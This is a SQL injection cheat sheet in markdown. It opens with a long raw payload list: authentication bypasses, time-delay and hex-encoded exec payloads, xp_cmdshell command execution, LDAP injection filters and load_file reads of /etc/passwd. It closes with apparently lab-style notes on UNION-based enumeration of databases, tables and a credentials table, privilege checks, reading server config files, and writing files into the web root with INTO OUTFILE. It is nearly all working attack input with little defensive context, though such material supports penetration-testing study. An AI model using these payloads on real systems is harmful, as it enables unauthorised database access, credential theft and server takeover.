sql_cheatsheet.md

<>"'%;)(&+
|
!
?
/
//
//*
'
' -- 
(
)
*|
*/*
&
0
031003000270000
0 or 1=1
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
as
asc
a' waitfor delay '0:0:10'--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > 
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
declare @s varchar(22) select @s =
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
delete
desc
distinct
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec(@s)
'; exec ('sel' + 'ect us' + 'er')
exec sp
'; execute immediate 'sel' || 'ect us' || 'er'
exec xp
'; exec xp_regread
' group by userid having 1=1--
handler
having
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
 or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1-- 
'/**/or/**/1/**/=/**/1
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
 or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
‘ or 3=3 --
' or '7659'='7659
 or a=a
 or a = a
' or 'a'='a
' or a=a--
') or ('a'='a
" or "a"="a
) or (a=a
order by
' or (EXISTS)
 or isNULL(1/0) /*
" or isNULL(1/0) /*
' or 'something' like 'some%'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or 'unusual' = 'unusual'
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' or 'whatever' in ('whatever')
' -- &password=
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
select
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
'sqlvuln
'+sqlvuln
(sqlvuln)
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' union all select @@version--
' union select 
uni/**/on sel/**/ect
' UNION SELECT
' union select 1,load_file('/etc/passwd'),1,1,1;
) union select * from information_schema.tables;
' union select * from users where login = char(114,111,111,116);
update
'||UTL_HTTP.REQUEST
,@variable
@variable
@var select @var as var into temp end --
\x27UNION SELECT
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
ý or 1=1 --

admin' or '1'='1

' or 1=1

adam' or '1'='1

' OR id = 5) -- - : just on the username part

select emp_no, birth_date, first_name, last_name, gender, hire_date from employees UNION SELECT dept_no, dept_name, NULL, NULL, NULL, NULL from departments;

Find the number of columns in each table, then pad the shorter SELECT with NULL to "make up for" the difference.

select count(tem.emp_no) from (select emp_no, birth_date, first_name, last_name, gender, hire_date from employees UNION SELECT dept_no, dept_name, NULL, NULL, NULL, NULL from departments ) as tem;

' order by 1-- -

cn' UNION select 1,2,3-- -

The placeholders 1,2,3 are used to guess the number of columns.

cn' UNION select 1,2,3,4-- -

cn' UNION select 1,2,3,@@version-- -

INFORMATION_SCHEMA Database

To pull data from tables using UNION SELECT, we need to form our SELECT queries properly. To do so, we need the following information:

List of databases
List of tables within each database
List of columns within each table

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

This gets the current database the web app is using: cn' UNION select 1,database(),2,3-- -

This gets the list of tables for the given database:

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- -

READ FILES

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - (the file contents are only visible in the page source)

WRITE FILES

cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

cn' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

cn' UNION select 1,2,3,4,5-- -

cn' UNION select 1,LOAD_FILE("/etc/passwd"),2,3,4-- -

cn' UNION select 1,user(),2,3,4-- -

cn' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -

cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/config.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.php"),2,3,4-- -

cn' UNION select 1,LOAD_FILE("/var/www/html/index.php"),2,3,4-- -

cn' UNION select 1,LOAD_FILE("/var/www/html/config.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/index.php"),2,3,4-- -

cn' UNION select 1,LOAD_FILE("/etc/apache2/httpd.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/apache2/apache2.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/httpd/httpd.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/httpd/conf/httpd.conf"),2,3,4-- -

cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.css"),2,3,4-- -

cn' union select 1,'file written successfully!',3,4,5 into outfile '/var/www/html/proof.txt'-- - cn' union select 1,'file written successfully!',3,4,5 into outfile '/tmp/proof.txt'-- - cn' UNION select 1,LOAD_FILE("/tmp/proof.txt"),2,3,4-- -